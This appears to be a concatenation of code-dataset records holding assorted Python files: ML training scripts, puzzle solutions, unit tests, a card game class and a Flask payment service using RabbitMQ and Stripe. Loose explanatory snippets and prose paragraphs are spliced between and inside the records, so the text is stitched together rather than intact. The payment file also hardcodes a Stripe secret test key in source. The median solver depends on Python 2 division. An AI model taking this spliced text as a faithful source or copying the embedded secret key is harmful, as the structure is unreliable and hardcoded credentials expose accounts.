torch.tensor(triplets_test, device=device)\n length = 
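The reshaping around f.one_hot above is easy to get wrong; a minimal shape check (assumes PyTorch is installed; the vocabulary size 501 and the one-column-per-example layout follow the script above, the triplet ids are made up):

import torch
from torch.nn import functional as F

triplets = torch.tensor([[3, 17, 400], [1, 2, 3]])   # two (s, p, o) id triplets
x = F.one_hot(triplets, 501).float()                 # shape (2, 3, 501)
x = x.reshape(len(triplets), 501 * 3).t()            # shape (1503, 2), one column per example

w = torch.zeros(1, 501 * 3)                          # logistic weights
probs = torch.sigmoid(w @ x)                         # shape (1, 2)
print(x.shape, probs.shape)  # torch.Size([1503, 2]) torch.Size([1, 2])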
len(triplets_test)\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n y_p = logistic_model(theta, x).cpu().numpy().tolist()\n # print(y_p)\n # print(y.size())\n for i in range(len(triplets_test)):\n if (y_p[0][i] >= 0.5) and (ys_test[i] == 1):\n true_predictions += 1\n if y_p[0][i] >= 0.5:\n one_predictions += 1\n if ys_test[i] == 1:\n true_original += 1\n\n print(\"In test set:\")\n recall_rate = float(true_predictions) / float(true_original)\n print(\"recall rate:\", recall_rate)\n precision_rate = float(true_predictions) / float(one_predictions)\n print(\"precision_rate:\", precision_rate)\n if recall_rate != 0 or precision_rate != 0:\n f1_measure = 2 * (recall_rate * precision_rate) / (recall_rate + precision_rate)\n else:\n f1_measure = 0.0\n print(\"f1 measure:\", f1_measure)\n\n infopen1.close()\n infopen2.close()\n infopen3.close()\n outfopen.close()\n\n\nif __name__ == '__main__':\n OneHotProcessing(\"./sets/pre_onehot_train_set.txt\",\n \"./sets/pre_onehot_verification_set.txt\",\n \"./sets/pre_onehot_test_set.txt\",\n \"./sets/verification_out1.txt\")\n","sub_path":"OneHotProcessing.py","file_name":"OneHotProcessing.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160703041","text":"import torch\nimport torch.nn as nn\nfrom Models import Classifier as C\nfrom data import data_loader\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nlatent_size = 64 # size of noise input to generator\nhidden_size = 256\nimage_size = 784\nnum_epochs = 2000\n\nC = C().to(device)\n\ncriterion = nn.NLLLoss()\nc_optimizer = torch.optim.Adam(C.parameters(), lr=0.0002)\n\n\nfor epoch in range(num_epochs):\n print('Epoch: ', epoch)\n for i, (images, labels) in enumerate(data_loader):\n images = images.to(device)\n labels = labels.to(device)\n\n outputs = C(images)\n loss = criterion(outputs, labels)\n score = outputs\n\n c_optimizer.zero_grad()\n loss.backward()\n c_optimizer.step()\n\n if i % 100 == 0:\n result = 'Epoch: {}/{} loss: {} score: {}'.format(epoch, num_epochs, loss.item(), score.mean())\n print(result)\n torch.save(C.state_dict(), 'C{}.ckpt'.format(epoch))\n\n","sub_path":"gansWorking/classfier/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136044985","text":"# http://blog.amelieff.jp/?eid=231191\nimport os, shutil, glob\n\ncdir = os.getcwd()\ndata_dir = '/Users/petadimensionlab/Downloads/test01'\n#prefetch_dir = '/Users/snakaoka/ws/apps/sratoolkit/bin/'\nprefetch_dir = '/Users/petadimensionlab/ws/apps/pfastq_dump/bin/'\nDL_dir = '/Users/petadimensionlab/ncbi/public/sra/'\n\n## convert sra to fastq ##\nos.chdir(data_dir)\ncmd = prefetch_dir+'./prefetch --option-file '+os.path.join(data_dir,'SRR_Acc_List.txt')\nos.system(cmd)\nos.chdir(cdir)\n\n## move all data to an assigned folder ##\nos.chdir(DL_dir)\nfiles = glob.glob('*.sra')\nfor f in files:\n tmp = os.path.join(data_dir,f)\n shutil.move(f,tmp)\n\n ","sub_path":"exec_DLSSRs.py","file_name":"exec_DLSSRs.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"630371717","text":"\"\"\" Advent Of Code 2017 : 24 \"\"\"\n\nf = open('input.txt', 'r')\n_input = f.read().rstrip()\nf.close()\nlines = _input.split('\\n')\ncomponents = []\nfor line in lines:\n 
components.append(tuple([int(x) for x in line.split('/')]))\nmaxStrength = 0\nmaxLen = 0\nbridges = []\n# =====================================================================\n\n\ndef findNextComponent(port, components):\n for c in components:\n if port in c:\n return c\n return None\n# ---------------------\n\n\ndef getOtherPort(port, component):\n if port == component[0]:\n return component[1]\n else:\n return component[0]\n# ---------------------\n\n\ndef crawl(port, components, strength, length):\n global maxStrength, maxLen, bridges\n for c in components:\n if port in c:\n myComponents = components[:]\n myComponents.remove(c)\n curStr = strength + c[0] + c[1]\n other = getOtherPort(port, c)\n crawl(other, myComponents, curStr, length + 1)\n\n maxStrength = max(strength, maxStrength)\n maxLen = max(length, maxLen)\n bridges.append(tuple([length, strength]))\n return True\n# ---------------------\n\n\ndef main():\n crawl(0, components, 0, 0)\n print('Part 1:', maxStrength)\n maxBridgeLength = [x[1] for x in bridges if x[0] == maxLen]\n print('Part 2:', max(maxBridgeLength))\n# =====================================================================\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"aoc17/24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414061031","text":"\nimport sys\nimport math\nimport csv\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n question = sys.argv[1]\n\n if question == '2.ab':\n # Question 2.a\n file = open('rs_1.csv')\n csv_reader = csv.reader(file)\n\n rows = []\n for row in csv_reader:\n rows.append(row[0])\n\n result = []\n rain = no_rain = 0.0\n temp = 0\n\n for i in range(1, len(rows)):\n if rows[i] == '1':\n rain += 1.0\n temp = (rain / (rain + no_rain))\n elif rows[i] == '2':\n no_rain += 1.0\n temp = (rain / (rain + no_rain))\n result.append(temp)\n\n # print('P(r | s,w) = {0}'.format(result[-1]))\n plt.plot(result)\n plt.xlabel('Number of Samples')\n plt.ylabel('P(r | s,w)')\n plt.xscale('log')\n plt.ylim([0, 0.40])\n plt.savefig('a.png')\n\n # Question 2.b\n result_plus_epsilon = []\n result_minus_epsilon = []\n rain = no_rain = 0.0\n temp1 = temp2 = 0.0\n n = 0.0\n\n for i in range(1, len(rows)):\n if rows[i] == '1':\n rain += 1.0\n n += 1.0\n epsilon = math.sqrt(-(math.log(0.05/2))/(2*n))\n temp1 = (rain / (rain + no_rain)) + epsilon\n temp2 = (rain / (rain + no_rain)) - epsilon\n elif rows[i] == '2':\n no_rain += 1.0\n n += 1.0\n epsilon = math.sqrt(-(math.log(0.05 / 2)) / (2 * n))\n temp1 = (rain / (rain + no_rain)) + epsilon\n temp2 = (rain / (rain + no_rain)) - epsilon\n result_plus_epsilon.append(temp1)\n result_minus_epsilon.append(temp2)\n\n plt.plot(result_plus_epsilon)\n plt.plot(result_minus_epsilon)\n plt.ylim([-0.20, 0.70])\n plt.savefig('b.png')\n\n elif question == '2.c':\n # Question 2.a\n file = open('lw_1.csv')\n csv_reader = csv.reader(file)\n\n rows = []\n for row in csv_reader:\n rows.append(row)\n\n result = [0]\n rain = no_rain = 0.0\n temp_rain = temp_no_rain = 0.0\n temp = 0\n\n for i in range(len(rows)):\n if rows[i][0] == '1':\n rain += 1.0\n temp_rain += float(rows[i][1])\n temp = (temp_rain / (temp_rain + temp_no_rain))\n elif rows[i][0] == '2':\n no_rain += 1.0\n temp_no_rain += float(rows[i][1])\n temp = (temp_rain / (temp_rain + temp_no_rain))\n result.append(temp)\n\n print('P(r | s,w) = {0}'.format(result[-1]))\n print('rain: {0}'.format(rain))\n print('no 
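The epsilon used for the band in question 2.b is the two-sided Hoeffding bound with delta = 0.05; a standalone look at how it shrinks with the sample count:

from math import log, sqrt

def hoeffding_epsilon(n, delta=0.05):
    # Half-width of a (1 - delta) confidence interval for a Bernoulli mean,
    # identical to sqrt(-log(delta / 2) / (2 n)) as computed in the script.
    return sqrt(log(2 / delta) / (2 * n))

for n in (10, 100, 1000, 10000):
    print(n, round(hoeffding_epsilon(n), 4))
# 10 0.4295
# 100 0.1358
# 1000 0.0429
# 10000 0.0136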
rain: {0}'.format(no_rain))\n print('total: {0}'.format(rain + no_rain))\n plt.plot(result)\n plt.xlabel('Number of Samples')\n plt.ylabel('P(r | s,w)')\n plt.xscale('log')\n plt.ylim([0, 0.70])\n plt.savefig('c.png')\n else:\n print('Invalid question number')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44830856","text":"# class Solution(object):\n# def findMedianSortedArrays(self, nums1, nums2):\n# \"\"\"\n# :type nums1: List[int]\n# :type nums2: List[int]\n# :rtype: float\n# \"\"\"\n# i=j=0\n# res = []\n# while i < len(nums1) and j < len(nums2):\n# if nums1[i] < nums2[j]:\n# res.append(nums1[i])\n# i += 1\n# else:\n# res.append(nums2[j])\n# j += 1\n# if i == len(nums1):\n# res.extend(nums2[j:])\n# if j == len(nums2):\n# res.extend(nums1[i:])\n# k = len(res)\n# if k % 2 == 0: \n# return (res[k/2-1] + res[k/2]) / 2.\n# else:\n# return res[k // 2]\n\n# O(log(min(m,n))\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n A,B = nums1,nums2\n m,n=len(A),len(B)\n if m > n:\n A, B, m, n = B, A, n, m\n if n == 0:\n raise ValueError\n \n imin, imax, half_len = 0, m, (m+n+1) / 2\n while imin<=imax:\n i = (imin+imax) / 2\n j = half_len - i\n if i < m and A[i] < B[j-1]:\n imin = i + 1\n elif i > 0 and A[i-1] > B[j]:\n imax = i - 1\n else:\n # i is perfect\n if i == 0: max_of_left = B[j-1]\n elif j == 0: max_of_left = A[i-1]\n else: max_of_left = max(A[i-1], B[j-1])\n\n if (m + n) % 2 == 1:\n return max_of_left\n\n if i == m: min_of_right = B[j]\n elif j == n: min_of_right = A[i]\n else: min_of_right = min(A[i], B[j])\n\n return (max_of_left + min_of_right) / 2.0 ","sub_path":"leetcode/4_Median of Two Sorted Arrays.py","file_name":"4_Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620525665","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nCreated on 16/07/09 22:12:33\n\n@author: Changzhi Sun\n\"\"\"\nimport os\nfrom my_package.sentence import Sentence\nfrom my_package.static import Static\n\n\ndef clean(filename):\n complex_set = set()\n with open(filename, \"r\", encoding=\"utf8\") as f:\n for line in f:\n word = line.strip()\n tokens = word.split(' ')\n if tokens[0] in Static.BE:\n continue\n if len(tokens) > 10 or len(tokens) == 1:\n continue\n if Sentence.is_weak_opinwd(word):\n continue\n complex_set.add(word)\n return complex_set\n\nif __name__ == \"__main__\":\n domains = [ \"reviews_Cell_Phones_and_Accessories\",\n \"reviews_Movies_and_TV\",\n \"reviews_Grocery_and_Gourmet_Food\",\n \"reviews_Pet_Supplies\"]\n for domain in domains:\n domain_dir = os.path.join(os.getenv(\"OPIE_DIR\"), \"data/domains\", domain)\n complex_dir = os.path.join(domain_dir, \"complex\")\n candidate_raw_dir = os.path.join(complex_dir, \"candidate_raw\")\n threshold = [\"0.5\", \"0.8\"]\n train_dev = [\"train\", \"test\"]\n for d in train_dev:\n for t in threshold:\n f = open(os.path.join(complex_dir, \"candidate_clean\", \"%s-complex.%s\" % (t, d)), \"w\", encoding=\"utf8\")\n for e in clean(os.path.join(candidate_raw_dir, \"%s-step3000.%s\" % (t, d))):\n print(e, file=f)\n 
f.close()\n","sub_path":"src/my_package/complex/clean_candidate_complex.py","file_name":"clean_candidate_complex.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92357713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 25 18:13:03 2018\n\n@author: hamdymostafa\n\"\"\"\n\n## helper functions:\nimport numpy as np\n\ndef initialize_parameters(X):\n '''\n input: training features data \n output: parameters initialized with zeros\n '''\n w = np.zeros((X.shape[0],1))\n return w\n\ndef sigmoid(z):\n \"\"\"\n input: a scalar or an array\n ouptut: probability using sigmoid function\n \"\"\"\n s = 1/(1+np.exp(-z)) \n return s\n\ndef propagate(X,Y,w):\n '''\n input: weights and training data\n output: cost, dw (dj/dw)\n '''\n # FORWARD PROPAGATION (FROM X TO COST)\n\n Z = w.T@X\n A = sigmoid(Z) # activation function)\n A = A.T # transpose to a column vector\n \n m = X.shape[1]\n J = (-1/m)* np.sum(Y*np.log(A) + (1.-Y)*np.log(1.-A)) \n \n # BACKWARD PROPAGATION (TO FIND GRAD)\n dw = (1/m)* (X@(A-Y))\n \n return dw, J\n\n \ndef optimize(X, Y, w, learning_rate, num_iterations,print_cost = False ):\n \"\"\"\n input: training data, weights, learning rate, number of iterations\n output: parameters (after learning)\n \"\"\"\n costs = [] # I will accumelate the cost to see the behavior of the model! \n for i in range(num_iterations):\n dw, J = propagate(X,Y,w)\n w -= learning_rate*dw\n \n if i % 100 == 0:\n costs.append(J)\n \n \n # Print the cost every 100 training iterations\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, J))\n\n return w,costs\n\n\ndef predict(X,w):\n '''\n input: testing data (just features) , parameters\n output: all predictions (0/1)\n '''\n Z = w.T@X\n A = sigmoid(Z) \n A = A.T\n Y_prediction = (A > 0.5).astype(int)\n \n return Y_prediction\n\n\n\n\ndef model(X_train, Y_train, num_iterations = 2000, learning_rate = 0.5,print_cost = False):\n '''\n input: training data , number of iterations, learning rate\n ouput: model inforamtion (parameters)\n '''\n \n # initialize parameters with zeros \n w = initialize_parameters(X_train)\n \n # propagate (compute loss , gradient) & learning (update gradient)\n w,costs = optimize(X_train, Y_train , w, learning_rate, num_iterations )\n \n \n return w,costs","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"62458813","text":"from games.scopa import Card, Hand\nfrom random import *\n\n\nclass Deck:\n def __init__(self):\n self.cards = []\n for x in range(4):\n for y in range(10):\n self.cards.append(Card.Card(x, y))\n\n def __str__(self) -> str:\n s = \"\"\n for x in range(1, len(self.cards) + 1):\n s += \" \" * x + str(self.cards[x - 1]) + \"\\n\"\n return s\n\n def deal(self, hand: Hand):\n for y in range(4):\n hand.plate.append(self.cards.pop())\n self.pick(hand)\n\n def isempty(self) -> bool:\n if len(self.cards) == 0:\n return True\n return False\n\n def pick(self, hand: Hand):\n x = hand.players.head\n for i in range(hand.players.length):\n if x.number == hand.number:\n break\n x = x.following\n for z in range(3):\n for i in range(hand.players.length):\n x.value.addcard(self.cards.pop())\n x = x.following\n\n def shuffle(self):\n x = len(self.cards)\n for y in range(x):\n z = randint(y, x - 1)\n self.cards[y], self.cards[z] = 
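The column-per-example convention of the helpers above can be demonstrated end to end on a tiny synthetic problem; a sketch with the same sigmoid and gradient update, plus a constant-1 feature row standing in for the bias the original model omits (data and hyper-parameters are made up):

import numpy as np

# One example per column; the second row is a constant-1 bias feature.
X = np.array([[0., 1., 2., 3., 4., 5.],
              [1., 1., 1., 1., 1., 1.]])
Y = np.array([0, 0, 0, 1, 1, 1])

w = np.zeros((2, 1))
for _ in range(5000):
    A = 1 / (1 + np.exp(-(w.T @ X)))   # predictions, shape (1, 6)
    dw = X @ (A - Y).T / X.shape[1]    # gradient, shape (2, 1)
    w -= 0.5 * dw

print((1 / (1 + np.exp(-(w.T @ X))) > 0.5).astype(int))  # [[0 0 0 1 1 1]]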
self.cards[z], self.cards[y]\n","sub_path":"games/scopa/Deck.py","file_name":"Deck.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349220790","text":"dungeon = [[100]]\n\n\ndef calculateMinimumHP(dungeon):\n m = len(dungeon)\n n = len(dungeon[0])\n dungeon[m - 1][n - 1] = min(0, dungeon[m - 1][n - 1])\n\n for i in range(m - 2, -1, -1):\n dungeon[i][-1] = min(0, (dungeon[i + 1][-1] + dungeon[i][-1]))\n\n for j in range(n - 2, -1, -1):\n dungeon[-1][j] = min(0, (dungeon[-1][j + 1] + dungeon[-1][j]))\n\n for i in range(m - 2, -1, -1):\n for j in range(n - 2, -1, -1):\n dungeon[i][j] = min(0, dungeon[i][j] +\n max(dungeon[i + 1][j], dungeon[i][j + 1]))\n\n return 1 - dungeon[0][0]\n\n\nprint(calculateMinimumHP(dungeon))\n","sub_path":"leetcode/60-100/67.py","file_name":"67.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55532820","text":"import pytest\nfrom qcore.asserts import AssertRaises, assert_eq\n\nfrom tabml import feature_config_helper\nfrom tabml.utils.pb_helpers import parse_feature_config_pb\nfrom tabml.utils.utils import write_str_to_file\n\n\nclass TestFeatureConfigHelper:\n @pytest.fixture(autouse=True)\n def setup_class(cls, tmp_path):\n feature_config_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 1\n name: \"b\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 2\n name: \"c\"\n dependencies: \"a\"\n dependencies: \"b\"\n }\n transforming_features {\n index: 3\n name: \"d\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 4\n name: \"e\"\n dependencies: \"c\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"feature_config_str.pbtxt\"\n write_str_to_file(feature_config_str, pb_config_path)\n cls.fm_helper = feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n def test_raise_value_error_with_invalid_indexes(self, tmp_path):\n invalid_index_pb_str = \"\"\"\n # invalid config with indexes are not continuous\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"TIME\"\n }\n transforming_features {\n index: 1\n name: \"hour\"\n dependencies: \"TIME\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(invalid_index_pb_str, pb_config_path)\n with AssertRaises(ValueError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"Feature indexes must be a list of increasing positive integers. 
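The bottom-up sweep in the dungeon solution above is easiest to follow on the classic 3x3 grid from LeetCode 174; a standalone version of the same recurrence that works on a copy instead of mutating its input:

def calculate_minimum_hp(dungeon):
    # d[i][j] = most negative cumulative balance tolerable on entering (i, j),
    # clamped at 0 because surplus health cannot be banked.
    m, n = len(dungeon), len(dungeon[0])
    d = [row[:] for row in dungeon]
    d[m - 1][n - 1] = min(0, d[m - 1][n - 1])
    for i in range(m - 2, -1, -1):
        d[i][n - 1] = min(0, d[i + 1][n - 1] + d[i][n - 1])
    for j in range(n - 2, -1, -1):
        d[m - 1][j] = min(0, d[m - 1][j + 1] + d[m - 1][j])
    for i in range(m - 2, -1, -1):
        for j in range(n - 2, -1, -1):
            d[i][j] = min(0, d[i][j] + max(d[i + 1][j], d[i][j + 1]))
    return 1 - d[0][0]

print(calculate_minimum_hp([[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]))  # 7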
\"\n \"Got indexes = [1, 1]\"\n ),\n )\n\n def test_raise_assertion_error_with_duplicate_features(self, tmp_path):\n pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"TIME\"\n }\n transforming_features {\n index: 2\n name: \"weekday\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(pb_str, pb_config_path)\n with AssertRaises(AssertionError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"There are duplicate objects in the list: \"\n ),\n )\n\n def test_raise_value_error_with_invalid_dependencies(self, tmp_path):\n invalid_dependency_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"date\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(invalid_dependency_pb_str, pb_config_path)\n with AssertRaises(AssertionError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"Feature weekday depends on feature date that is undefined.\"\n ),\n )\n\n def test_find_dependents(self, tmp_path):\n got_1 = self.fm_helper.find_dependents(\"a\")\n expected_1 = [\"b\", \"c\", \"d\", \"e\"]\n assert_eq(expected_1, got_1)\n\n got_2 = self.fm_helper.find_dependents(\"b\")\n expected_2 = [\"c\", \"e\"]\n assert_eq(expected_2, got_2)\n\n got_3 = self.fm_helper.find_dependents(\"d\")\n expected_3 = []\n assert_eq(expected_3, got_3)\n\n def test_append_dependents(self, tmp_path):\n got = self.fm_helper.append_dependents([\"d\", \"b\"])\n expected = [\"b\", \"c\", \"d\", \"e\"]\n assert_eq(expected, got)\n\n def test_extract_config_1(self, tmp_path):\n subset_features = [\"e\"]\n expected_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 1\n name: \"b\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 2\n name: \"c\"\n dependencies: \"a\"\n dependencies: \"b\"\n }\n transforming_features {\n index: 4\n name: \"e\"\n dependencies: \"c\"\n }\n \"\"\"\n new_pb_config_path = tmp_path / \"new_tmp.pb\"\n write_str_to_file(expected_pb_str, new_pb_config_path)\n new_config = self.fm_helper.extract_config(selected_features=subset_features)\n assert_eq(parse_feature_config_pb(new_pb_config_path), new_config)\n\n def test_extract_config_2(self, tmp_path):\n subset_features = [\"d\"]\n expected_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 3\n name: \"d\"\n dependencies: \"a\"\n }\n \"\"\"\n new_pb_config_path = tmp_path / \"new_tmp.pb\"\n write_str_to_file(expected_pb_str, new_pb_config_path)\n new_config = self.fm_helper.extract_config(selected_features=subset_features)\n assert_eq(parse_feature_config_pb(new_pb_config_path), new_config)\n\n def test_raise_value_error_with_invalid_feature_to_extract(self, tmp_path):\n subset_features = [\"a\", \"y\", \"z\"]\n with AssertRaises(ValueError) as assert_raises:\n 
self.fm_helper.extract_config(selected_features=subset_features)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n error_message.args[0], \"Features ['y', 'z'] are not in the original config.\"\n )\n","sub_path":"tests/test_feature_config_helper.py","file_name":"test_feature_config_helper.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186478266","text":"import time\nimport json\nimport sys\nimport os\nfrom flask import Flask, request, jsonify, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport requests\nfrom threading import Thread\n\n# Communication patterns:\n# Use a message-broker with 'direct' exchange to enable interaction\nimport pika\n\napp = Flask(__name__)\nCORS(app)\n\nclass PaymentItem:\n hotel_payment = {}\n\n def __init__(self):\n self.hotel_payment = {}\n\n def clear_payments(self):\n self.hotel_payment = {}\n\npayment_dict = PaymentItem()\n\n# @app.route(\"/payment\", methods=['POST'])\ndef get_payment(data):\n hotelID = data[\"hotelID\"]\n voucherID = data[\"voucherID\"]\n amount = data[\"amount\"]\n print(data)\n if hotelID in payment_dict.hotel_payment:\n payment_dict.hotel_payment[hotelID] = amount + payment_dict.hotel_payment[hotelID]\n else:\n payment_dict.hotel_payment[hotelID] = amount\n\n # print(payment_dict.hotel_payment)\n return payment_dict.hotel_payment\n\n@app.route(\"/display-payment\")\ndef stripe_payment():\n # print(payment_dict.hotel_payment)\n # payment_dict.clear_payments()\n # print(payment_dict.hotel_payment)\n payment()\n # print(payment_dict.hotel_payment)\n return payment_dict.hotel_payment\n\n@app.route(\"/get-payments\")\ndef payment():\n toReturn = []\n hostname = \"localhost\" # default broker hostname\n port = 5672 # default port\n # connect to the broker and set up a communication channel in the connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))\n channel = connection.channel()\n\n # set up the exchange if the exchange doesn't exist\n exchangename=\"payment_direct\"\n channel.exchange_declare(exchange=exchangename, exchange_type='direct')\n\n # prepare a queue for receiving messages\n channelqueue = channel.queue_declare(queue=\"paymenthandler\", durable=True) # 'durable' makes the queue survive broker restarts\n queue_name = channelqueue.method.queue\n channel.queue_bind(exchange=exchangename, queue=queue_name, routing_key='payment.process') # bind the queue to the exchange via the key\n\n \n method_frame, header_frame, body = channel.basic_get(queue=queue_name, auto_ack=True)\n while body != None:\n processingHotelpayment(json.loads(body))\n toReturn.append(json.loads(body))\n method_frame, header_frame, body = channel.basic_get(queue=queue_name, auto_ack=True)\n\n print(toReturn)\n return jsonify({\"vouchers\": toReturn})\n\ndef processingHotelpayment(payment):\n print(\"Processing a hotel payment:\")\n # url = \"http://127.0.0.1:5005/payment\"\n print(payment)\n hotelID = payment[0]\n voucherID = payment[1]\n amount = payment[2]\n data = {\"hotelID\": hotelID, \"voucherID\": voucherID, \"amount\": amount}\n get_payment(data)\n\n@app.route('/charge', methods=['POST'])\ndef charge():\n api_key = 'sk_test_UW031AKQAKbNym0mu9SITQAx00Ai4PhNOm'\n # data = request.get_json()\n\n try:\n token = request.form.get('stripeToken')\n\n amount = float(request.form.get('total_amount')) * 100\n\n amount = int(amount)\n\n # todo: stripe 
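The basic_get loop above only drains messages that are already queued. The matching producer is not shown in this file; a sketch of what it might look like, reusing the exchange name and routing key from the consumer code (the payload is the [hotelID, voucherID, amount] list that processingHotelpayment unpacks, with invented values):

import json
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost', port=5672))
channel = connection.channel()
channel.exchange_declare(exchange='payment_direct', exchange_type='direct')

# hypothetical payment: [hotelID, voucherID, amount]
payment = ['hotel-1', 'voucher-42', 150.0]
channel.basic_publish(
    exchange='payment_direct',
    routing_key='payment.process',
    body=json.dumps(payment),
    properties=pika.BasicProperties(delivery_mode=2),  # persistent, matching the durable queue
)
connection.close()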
stuff\n headers = {'Authorization' : f'Bearer {api_key}'}\n data = {\n 'amount' : str(amount),\n 'currency' : 'sgd',\n 'description' : 'Another Charge',\n 'source' : token\n }\n\n r = requests.post('https://api.stripe.com/v1/charges', headers=headers, data=data)\n\n print(r.text)\n print('its ok')\n print(amount)\n # return redirect('manager.html', code,302)\n return jsonify({\"message\": \"payment successful\"}),200\n except:\n print(\"Error processing payment\")\n return jsonify({\"message\": \"An error occurred when processing the payment.\"}), 500\n\n\nif __name__ == \"__main__\": # execute this program only if it is run as a script (not by 'import')\n print(\"This is \" + os.path.basename(__file__) + \": processing payment request...\")\n app.run(port = 5005, debug = True)\n","sub_path":"payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320956039","text":"#!/usr/bin/env python3\n# -*-coding: utf-8 -*\n\n\n# ****** ****** #\n# ******** Summarize the duration of each phone ******* #\n# ********** For further phone length analysis ******** #\n# ****** ****** #\n\nimport glob, sys\nfrom math import sqrt\nfrom os import path, mkdir\nimport numpy as np\n\n##input\nhandle = sys.argv[1]\nrttm_files_path = handle+\"/rttm_output/\" ##if DNN-based forced-aligments\n##output\noutput_dir = handle+\"/durations/\"\nif not path.exists(output_dir):\n mkdir(output_dir)\n#fi\n\n#init dict which will retrieve all duration of each phone\ntotal_ms = {} \n\nwith open(output_dir+\"forced-alignment-stat.txt\", \"w\") as summary:\n\tfor file in sorted (glob.glob(rttm_files_path+\"*rttm\")):\n\t\tf=file.split('/')\n\t\tname = f[3]\n\t\tsummary.write(\"{}\\n\".format(name))\n\t\tsummary.write(\"-------------------------\\n\\n\")\n\t\tfor line in open(file):\n\t\t\tduree_ms = float(line.split(' ')[3]) #duration of the phone in milliseconds in ms\n\t\t\tlabel = line.split(' ')[4] #e.g.: t_B\n\t\t\tphoneme = label.split('_')[0].strip() #phoneme #e.g.: t\n\t\t\t#retrieval of the phonemes\n\t\t\tif phoneme not in total_ms:\n\t\t\t\ttotal_ms[phoneme]=[] #add a new entry in the dictionnary\n\t\t\t#fi\n\t\t\ttotal_ms[phoneme].append(float(duree_ms))\n\t\t\tsummary.write(\"{}:\\t{:.1f} ms\\n\".format(phoneme, duree_ms)) #write the phoneme and its corresponding duration in a readable format\n\t\t#endFor\n\t\tsummary.write(\"\\n\")\n\t#endFor --processing input file 